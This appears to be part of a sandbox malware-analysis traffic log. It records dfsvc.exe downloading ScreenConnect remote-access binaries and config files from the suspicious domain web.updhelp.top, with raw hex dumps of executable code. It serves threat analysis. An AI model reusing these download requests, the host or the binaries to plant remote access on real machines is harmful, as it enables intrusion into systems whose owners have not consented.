                                                                                                                  Data Ascii: AjXk@ALjX@ALh|@U%KA$@Aj@e3SVW3}S[wO3WE}EGenuE5ineIEE5ntelE3@S[]EEsKSuCE%?=t#=`t=pt=Pt=`t=pu=KA=KA
                                                                                                                  2025-04-12 15:58:02 UTC1369INData Raw: 40 41 00 5e c3 b8 00 40 00 00 c3 68 c0 4b 41 00 ff 15 d0 d0 40 00 c3 b0 01 c3 68 00 00 03 00 68 00 00 01 00 6a 00 e8 b3 3a 00 00 83 c4 0c 85 c0 75 01 c3 6a 07 e8 83 fc ff ff cc b8 c8 4b 41 00 c3 b8 d0 4b 41 00 c3 e8 ef ff ff ff 8b 48 04 83 08 24 89 48 04 e8 e7 ff ff ff 8b 48 04 83 08 02 89 48 04 c3 33 c0 39 05 10 40 41 00 0f 94 c0 c3 b8 74 52 41 00 c3 b8 70 52 41 00 c3 53 56 be ec 27 41 00 bb ec 27 41 00 3b f3 73 19 57 8b 3e 85 ff 74 0a 8b cf ff 15 88 d1 40 00 ff d7 83 c6 04 3b f3 72 e9 5f 5e 5b c3 53 56 be f4 27 41 00 bb f4 27 41 00 3b f3 73 19 57 8b 3e 85 ff 74 0a 8b cf ff 15 88 d1 40 00 ff d7 83 c6 04 3b f3 72 e9 5f 5e 5b c3 55 8b ec 56 ff 75 08 8b f1 e8 58 00 00 00 c7 06 a8 d2 40 00 8b c6 5e 5d c2 04 00 83 61 04 00 8b c1 83 61 08 00 c7 41 04 b0 d2 40
                                                                                                                  Data Ascii: @A^@hKA@hhj:ujKAKAH$HHH39@AtRApRASV'A'A;sW>t@;r_^[SV'A'A;sW>t@;r_^[UVuX@^]aaA@
                                                                                                                  2025-04-12 15:58:02 UTC1369INData Raw: fc 8b 5d 0c 8b 63 1c 8b 6b 20 ff e0 33 c0 40 5b c9 c3 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 6c 14 00 00 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 6a 08 68 d0 29 41 00 e8 1e f9 ff ff 8b 45 08 85 c0 74 7e 81 38 63 73 6d e0 75 76 83 78 10 03 75 70 81 78 14 20 05 93 19 74 12 81 78 14 21 05 93 19 74 09 81 78 14 22 05 93 19 75 55 8b 48 1c 85 c9 74 4e 8b 51 04 85 d2 74 29 83 65 fc 00 52 ff 70 18 e8 4a 00 00 00 c7 45 fc fe ff ff ff eb 31 ff 75 0c ff 75 ec e8 43 00 00 00 59 59 c3 8b 65 e8 eb e4 f6 01 10 74 19 8b 40 18 8b 08 85 c9 74 10 8b 01 51 8b 70 08 8b ce ff 15 88 d1 40 00 ff d6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 55 8b ec 8b 4d 08 ff 55 0c 5d c2 08 00 55 8b ec 80 7d 0c 00 74 32
                                                                                                                  Data Ascii: ]ck 3@[USVWE3PPPuuuuul E_^[E]jh)AEt~8csmuvxupx tx!tx"uUHtNQt)eRpJE1uuCYYet@tQp@MdY_^[UMU]U}t2
                                                                                                                  2025-04-12 15:58:02 UTC1369INData Raw: 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 f7 c7 0f 00 00 00 74 0f 49 4e 4f 8a 06 88 07 f7 c7 0f 00 00 00 75 f1 81 f9 80 00 00 00 72 68 81 ee 80 00 00 00 81 ef 80 00 00 00 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 6f 56 20 f3 0f 6f 5e 30 f3 0f 6f 66 40 f3 0f 6f 6e 50 f3 0f 6f 76 60 f3 0f 6f 7e 70 f3 0f 7f 07 f3 0f 7f 4f 10 f3 0f 7f 57 20 f3 0f 7f 5f 30 f3 0f 7f 67 40 f3 0f 7f 6f 50 f3 0f 7f 77 60 f3 0f 7f 7f 70 81 e9 80 00 00 00 f7 c1 80 ff ff ff 75 90 83 f9 20 72 23 83 ee 20 83 ef 20 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 7f 07 f3 0f 7f 4f 10 83 e9 20 f7 c1 e0 ff ff ff 75 dd f7 c1 fc ff ff ff 74 15 83 ef 04 83 ee 04 8b 06 89 07 83 e9 04 f7 c1 fc ff ff ff 75 eb 85 c9 74 0f 83 ef 01 83 ee 01 8a 06 88 07 83 e9 01 75 f1 8b 44 24 0c 5e 5f c3 eb 03 cc cc cc 8b c6 83 e0 0f 85
                                                                                                                  Data Ascii: FGD$^_tINOurhooNoV o^0of@onPov`o~pOW _0g@oPw`pu r# ooNO ututuD$^_
                                                                                                                  2025-04-12 15:58:02 UTC1369INData Raw: ec 8b 45 08 8b 4d 0c 3b c1 75 04 33 c0 5d c3 83 c1 05 83 c0 05 8a 10 3a 11 75 18 84 d2 74 ec 8a 50 01 3a 51 01 75 0c 83 c0 02 83 c1 02 84 d2 75 e4 eb d8 1b c0 83 c8 01 5d c3 55 8b ec 57 8b 7d 08 80 7f 04 00 74 48 8b 0f 85 c9 74 42 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 53 56 8d 59 01 53 e8 64 2a 00 00 8b f0 59 85 f6 74 19 ff 37 53 56 e8 01 2b 00 00 8b 45 0c 8b ce 83 c4 0c 33 f6 89 08 c6 40 04 01 56 e8 08 15 00 00 59 5e 5b eb 0b 8b 4d 0c 8b 07 89 01 c6 41 04 00 5f 5d c3 55 8b ec 56 8b 75 08 80 7e 04 00 74 08 ff 36 e8 e1 14 00 00 59 83 26 00 c6 46 04 00 5e 5d c3 55 8b ec 83 ec 14 8b 45 08 53 57 8b 7d 0c bb 20 05 93 19 89 45 f0 85 ff 74 2d f6 07 10 74 1e 8b 08 83 e9 04 56 51 8b 01 8b 70 20 8b ce 8b 78 18 ff 15 88 d1 40 00 ff d6 5e 85 ff 74 0a f6 07 08 74 05 bb
                                                                                                                  Data Ascii: EM;u3]:utP:Quu]UW}tHtBQAu+SVYSd*Yt7SV+E3@VY^[MA_]UVu~t6Y&F^]UESW} Et-tVQp x@^tt


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.2460849104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:03 UTC107OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  2025-04-12 15:58:04 UTC1103INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:04 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 61208
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.WindowsBackstageShell.exe"; filename*=UTF-8''ScreenConnect.WindowsBackstageShell.exe
                                                                                                                  CF-Cache-Status: BYPASS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=arEJn1CzCoxMRJbmtixnt6AFdcP6HvmxKTW9VqukkHHOZw7laBO2skowxdxpJ1Hn665ar6uYLPMWdeehfz9rZGzhRKPn876sRz%2Ft8J0xc1QiPHXe%2FE14FcUVOKcPOu%2Fc6O8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec48fbb56771-ATL
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=106229&min_rtt=106164&rtt_var=22452&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=722&delivery_rate=38029&cwnd=252&unsent_bytes=0&cid=d0c2680550e91f21&ts=981&x=0"
                                                                                                                  2025-04-12 15:58:04 UTC266INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 15 7c 8d ed 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 5e d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 1e d4 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL|"0^ @ @
                                                                                                                  2025-04-12 15:58:04 UTC1369INData Raw: 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 c6 00 00 18 29 00 00 00 00 01 00 0c 00 00 00 50 d7 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 b8 00 00 00 20 00 00 00 ba 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 06 00 00 00 e0 00 00 00 08 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3d d8 00 00 00 00 00 00 48
                                                                                                                  Data Ascii: )P8 H.textd `.rsrc @@.reloc@B=H
                                                                                                                  2025-04-12 15:58:04 UTC1369INData Raw: 05 28 60 00 00 0a 7e 16 00 00 04 28 61 00 00 0a 02 28 0f 00 00 06 6f 62 00 00 0a 18 8d 2d 00 00 01 25 16 73 5c 00 00 06 25 7e 63 00 00 0a 72 42 02 00 70 7e 17 00 00 04 28 64 00 00 0a 6f 65 00 00 0a 25 17 6f 2b 00 00 06 a2 25 17 73 5f 00 00 06 25 1f 16 7e 17 00 00 04 28 71 00 00 06 6f 65 00 00 0a 25 17 6f 2b 00 00 06 a2 6f 66 00 00 0a 7e 32 00 00 04 13 09 16 13 0a 38 dc 00 00 00 11 09 11 0a 9a 13 0b 73 88 00 00 06 13 0c 11 0c 02 7d 3f 00 00 04 11 0c 11 0b 28 54 00 00 0a 73 67 00 00 0a 7d 3e 00 00 04 11 0c 7b 3e 00 00 04 6f 68 00 00 0a 39 9c 00 00 00 73 8b 00 00 06 13 0d 11 0d 11 0c 7b 3e 00 00 04 6f 69 00 00 0a 72 66 02 00 70 28 6a 00 00 0a 2d 0e 11 0c 7b 3e 00 00 04 6f 17 00 00 0a 2b 13 11 0c fe 06 89 00 00 06 73 6b 00 00 0a 17 28 02 00 00 2b 7d 40 00 00
                                                                                                                  Data Ascii: (`~(a(ob-%s\%~crBp~(doe%o+%s_%~(qoe%o+of~28s}?(Tsg}>{>oh9s{>oirfp(j-{>o+sk(+}@
                                                                                                                  2025-04-12 15:58:04 UTC1369INData Raw: 25 2d 17 26 7e 36 00 00 04 fe 06 7f 00 00 06 73 89 00 00 0a 25 80 37 00 00 04 28 0b 00 00 2b 2a 13 30 04 00 f9 01 00 00 03 00 00 11 03 28 8a 00 00 0a 0a 03 12 01 28 8b 00 00 0a 39 e4 01 00 00 06 28 38 00 00 0a 33 15 07 7b 8c 00 00 0a 20 00 00 00 80 28 0c 00 00 2b 3a c7 01 00 00 07 7b 8c 00 00 0a 20 00 00 00 10 28 0c 00 00 2b 39 b2 01 00 00 03 1a 28 8e 00 00 0a 16 d3 28 7e 00 00 0a 2d 15 07 7b 8f 00 00 0a 20 00 00 04 00 28 0d 00 00 2b 39 8d 01 00 00 07 7b 8f 00 00 0a 20 00 00 00 08 28 0d 00 00 2b 2c 15 07 7b 8f 00 00 0a 20 00 00 04 00 28 0d 00 00 2b 39 66 01 00 00 07 7b 8f 00 00 0a 20 80 00 00 00 28 0d 00 00 2b 3a 51 01 00 00 73 80 00 00 06 0c 08 06 28 90 00 00 0a 7b 91 00 00 0a 7d 38 00 00 04 08 7b 38 00 00 04 28 92 00 00 0a 39 2a 01 00 00 73 82 00 00 06
                                                                                                                  Data Ascii: %-&~6s%7(+*0((9(83{ (+:{ (+9((~-{ (+9{ (+,{ (+9f{ (+:Qs({}8{8(9*s
                                                                                                                  2025-04-12 15:58:04 UTC1369INData Raw: 2c 1f 06 6f 25 00 00 06 2c 17 06 6f bb 00 00 0a 2c 0f 06 28 84 00 00 0a 2d 07 02 06 28 18 00 00 06 2a 66 03 6f 86 00 00 0a 02 28 3f 00 00 0a 16 d3 1f 64 16 d3 28 bc 00 00 0a 26 2a 1a 7e bd 00 00 0a 2a 1b 30 07 00 65 00 00 00 09 00 00 11 03 6f be 00 00 0a 75 37 00 00 01 0a 06 2c 55 12 01 7e bf 00 00 0a 06 6f c0 00 00 0a 28 c1 00 00 0a 7e 21 00 00 04 73 c2 00 00 0a 0c 03 6f c3 00 00 0a 08 12 01 28 5f 00 00 0a 12 01 28 c4 00 00 0a 12 01 28 60 00 00 0a 17 59 12 01 28 c5 00 00 0a 17 59 6f c6 00 00 0a de 0a 08 2c 06 08 6f 5e 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 2c 00 2e 5a 00 0a 00 00 00 00 13 30 04 00 46 00 00 00 00 00 00 00 03 6f c7 00 00 0a 6f bb 00 00 0a 2c 31 03 6f c8 00 00 0a 7e 24 00 00 04 7e bf 00 00 0a 03 6f c7 00 00 0a 6f c9 00 00 0a 73 c1 00 00
                                                                                                                  Data Ascii: ,o%,o,(-(*fo(?d(&*~*0eou7,U~o(~!so(_((`Y(Yo,o^*,.Z0Foo,1o~$~oos
                                                                                                                  2025-04-12 15:58:04 UTC1369INData Raw: 2a 1e 02 28 37 00 00 06 2a 32 02 28 38 00 00 06 28 6a 00 00 06 2a 1e 02 7b 12 00 00 04 2a 22 02 03 7d 12 00 00 04 2a 1e 02 7b 13 00 00 04 2a 22 02 03 7d 13 00 00 04 2a 1e 02 7b 14 00 00 04 2a 22 02 03 7d 14 00 00 04 2a 1e 02 7b 15 00 00 04 2a 22 02 03 7d 15 00 00 04 2a 9e 02 03 28 f7 00 00 0a 02 28 2c 00 00 06 2c 0c 02 28 3f 00 00 06 28 6c 00 00 06 2a 02 28 3f 00 00 06 28 6d 00 00 06 2a 1b 30 08 00 69 02 00 00 0d 00 00 11 02 03 28 e7 00 00 0a 02 28 e8 00 00 0a 6f e9 00 00 0a 3a 15 01 00 00 02 28 e8 00 00 0a 1b 8d 2d 00 00 01 25 16 02 28 3f 00 00 06 28 f8 00 00 0a 25 2d 06 26 72 74 03 00 70 14 02 fe 06 4a 00 00 06 73 f2 00 00 0a 73 77 00 00 06 25 02 6f f3 00 00 0a 17 73 f4 00 00 0a 6f f5 00 00 0a 25 02 28 43 00 00 06 6f f6 00 00 0a a2 25 17 73 9b 00 00 06
                                                                                                                  Data Ascii: *(7*2(8(j*{*"}*{*"}*{*"}*{*"}*((,,(?(l*(?(m*0i((o:(-%(?(%-&rtpJssw%oso%(Co%s
                                                                                                                  2025-04-12 15:58:04 UTC1369INData Raw: 00 0a 06 04 02 6f 2f 01 00 0a 2d 07 7e 23 00 00 04 2b 05 7e 22 00 00 04 28 5a 00 00 06 2a 00 00 00 1b 30 06 00 ef 00 00 00 12 00 00 11 05 73 30 01 00 0a 0a 03 0b 04 17 33 61 19 8d 31 00 00 01 25 16 12 01 28 22 01 00 0a 1a 59 12 01 28 26 01 00 0a 18 58 73 2d 01 00 0a a4 31 00 00 01 25 17 12 01 28 22 01 00 0a 1a 58 12 01 28 26 01 00 0a 18 58 73 2d 01 00 0a a4 31 00 00 01 25 18 12 01 28 22 01 00 0a 12 01 28 26 01 00 0a 18 59 73 2d 01 00 0a a4 31 00 00 01 0c 2b 5f 19 8d 31 00 00 01 25 16 12 01 28 22 01 00 0a 1a 59 12 01 28 26 01 00 0a 18 59 73 2d 01 00 0a a4 31 00 00 01 25 17 12 01 28 22 01 00 0a 1a 58 12 01 28 26 01 00 0a 18 59 73 2d 01 00 0a a4 31 00 00 01 25 18 12 01 28 22 01 00 0a 12 01 28 26 01 00 0a 18 58 73 2d 01 00 0a a4 31 00 00 01 0c 02 06 08 6f 31
                                                                                                                  Data Ascii: o/-~#+~"(Z*0s03a1%("Y(&Xs-1%("X(&Xs-1%("(&Ys-1+_1%("Y(&Ys-1%("X(&Ys-1%("(&Xs-1o1
                                                                                                                  2025-04-12 15:58:04 UTC1369INData Raw: 00 80 29 00 00 04 18 73 fd 00 00 0a 80 2a 00 00 04 19 80 2b 00 00 04 20 58 02 00 00 20 90 01 00 00 73 fa 00 00 0a 80 2c 00 00 04 1a 80 2d 00 00 04 18 80 2e 00 00 04 28 4b 01 00 0a 80 2f 00 00 04 1a 8d 81 00 00 01 25 16 72 66 02 00 70 a2 25 17 72 e4 05 00 70 a2 25 18 72 ee 05 00 70 a2 25 19 72 f8 05 00 70 a2 80 30 00 00 04 1b 8d 81 00 00 01 25 16 72 02 06 00 70 a2 25 17 72 0c 06 00 70 a2 25 18 72 1c 06 00 70 a2 25 19 72 26 06 00 70 a2 25 1a 72 30 06 00 70 a2 80 31 00 00 04 1f 0e 8d 81 00 00 01 25 16 72 3a 06 00 70 a2 25 17 72 a4 06 00 70 a2 25 18 72 1c 07 00 70 a2 25 19 72 58 07 00 70 a2 25 1a 72 e9 07 00 70 a2 25 1b 72 72 08 00 70 a2 25 1c 72 f5 08 00 70 a2 25 1d 72 6f 09 00 70 a2 25 1e 72 fa 09 00 70 a2 25 1f 09 72 89 0a 00 70 a2 25 1f 0a 72 54 0b 00 70
                                                                                                                  Data Ascii: )s*+ X s,-.(K/%rfp%rp%rp%rp0%rp%rp%rp%r&p%r0p1%r:p%rp%rp%rXp%rp%rrp%rp%rop%rp%rp%rTp
                                                                                                                  2025-04-12 15:58:04 UTC1369INData Raw: 17 6f 80 01 00 0a 20 04 01 00 00 73 81 01 00 0a 0b 07 20 04 01 00 00 16 d3 16 6f 82 01 00 0a 07 6f 83 01 00 0a 0c de 0a 06 2c 06 06 6f 5e 00 00 0a dc 08 2a 00 00 00 01 10 00 00 02 00 0b 00 42 4d 00 0a 00 00 00 00 66 02 20 12 01 00 00 20 20 f0 00 00 28 ab 00 00 0a 16 d3 28 a3 00 00 0a 26 2a 00 00 13 30 07 00 3a 00 00 00 1b 00 00 11 02 28 05 01 00 0a 2c 22 02 20 12 01 00 00 20 20 f1 00 00 28 ab 00 00 0a 16 d3 18 20 c8 00 00 00 12 00 28 84 01 00 0a 26 2b 08 02 1b 28 85 01 00 0a 26 02 28 86 01 00 0a 26 2a 00 00 13 30 08 00 57 00 00 00 1c 00 00 11 12 00 fe 15 5c 00 00 01 02 6f 17 00 00 0a 02 6f 87 01 00 0a 12 00 06 8c 5c 00 00 01 28 88 01 00 0a 20 10 42 02 00 17 0f 01 28 89 01 00 0a 1f 10 fe 02 16 fe 01 28 34 00 00 2b 28 8b 01 00 0a 06 7b 8c 01 00 0a 03 28 72
                                                                                                                  Data Ascii: o s oo,o^*BMf ((&*0:(," ( (&+(&(&*0W\oo\( B((4+({(r
                                                                                                                  2025-04-12 15:58:04 UTC1369INData Raw: 00 2b 19 6f bc 01 00 0a 2a 16 2a 00 00 00 13 30 02 00 26 00 00 00 23 00 00 11 03 02 7b 3b 00 00 04 2e 1b 03 75 12 00 00 02 0a 06 2c 0f 06 6f 41 00 00 06 02 7b 3b 00 00 04 fe 01 2a 16 2a 17 2a 1e 02 28 b8 01 00 0a 2a 4a 03 6f 3f 00 00 06 02 7b 3c 00 00 04 28 7e 00 00 0a 2a 52 03 6f 41 00 00 06 02 7b 3d 00 00 04 6f 41 00 00 06 fe 01 2a 1e 02 28 b8 01 00 0a 2a 72 02 7b 3f 00 00 04 28 3f 00 00 0a 02 7b 3e 00 00 04 6f 17 00 00 0a 28 6b 00 00 06 2a 4a 03 02 7b 3e 00 00 04 6f 17 00 00 0a 6f 39 00 00 06 2a 1e 02 28 b8 01 00 0a 2a 36 03 02 7b 40 00 00 04 6f 3b 00 00 06 2a 2e 73 8e 00 00 06 80 41 00 00 04 2a 1e 02 28 b8 01 00 0a 2a 46 03 28 84 00 00 0a 2c 07 03 6f 25 00 00 06 2a 16 2a 1e 03 28 84 00 00 0a 2a 1e 03 6f bb 00 00 0a 2a 2e 73 93 00 00 06 80 45 00 00 04
                                                                                                                  Data Ascii: +o**0&#{;.u,oA{;***(*Jo?{<(~*RoA{=oA*(*r{?(?{>o(k*J{>oo9*(*6{@o;*.sA*(*F(,o%**(*o*.sE


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.2460851104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:04 UTC111OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  2025-04-12 15:58:05 UTC1088INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:05 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 266
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.WindowsFileManager.exe.config"; filename*=UTF-8''ScreenConnect.WindowsFileManager.exe.config
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2FsTlNF5BQ3lq3keGazSq4VBWamdwM4mEDzoq0UHk4cVNB1AvDerQRMCTMPlZrwmW2tXLQGT2IfmqbHOkV1Ueryw3AEvTQiy118U24TZm53u%2B%2B8FND07bIBT2v6OY7ZMYS4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec515c4fbce6-ATL
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=106071&min_rtt=105731&rtt_var=22654&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=726&delivery_rate=38185&cwnd=252&unsent_bytes=0&cid=d075edee77b74db9&ts=853&x=0"
                                                                                                                  2025-04-12 15:58:05 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.2460852104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:05 UTC106OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  2025-04-12 15:58:06 UTC1080INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:06 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 266
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.WindowsClient.exe.config"; filename*=UTF-8''ScreenConnect.WindowsClient.exe.config
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18oip4U57WCY4DwP54E2sU6sabsvcuQB%2BZG35zzjVplN8bpcWcUNnJ%2BXZsM1za8zvJvCYn51FV67ZPoIS7AiSXgVYJ1T7JZR2eSVvUbwx0gkdg0h6kA1e31bq%2FrqqLoF%2BWE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec583c9332f3-JAX
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=113063&min_rtt=113050&rtt_var=23853&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=721&delivery_rate=35714&cwnd=252&unsent_bytes=0&cid=72c420578b01f20d&ts=434&x=0"
                                                                                                                  2025-04-12 15:58:06 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.2460853104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:06 UTC138OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-04-12 15:58:07 UTC1094INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:07 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 266
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.WindowsBackstageShell.exe.config"; filename*=UTF-8''ScreenConnect.WindowsBackstageShell.exe.config
                                                                                                                  cf-cache-status: DYNAMIC
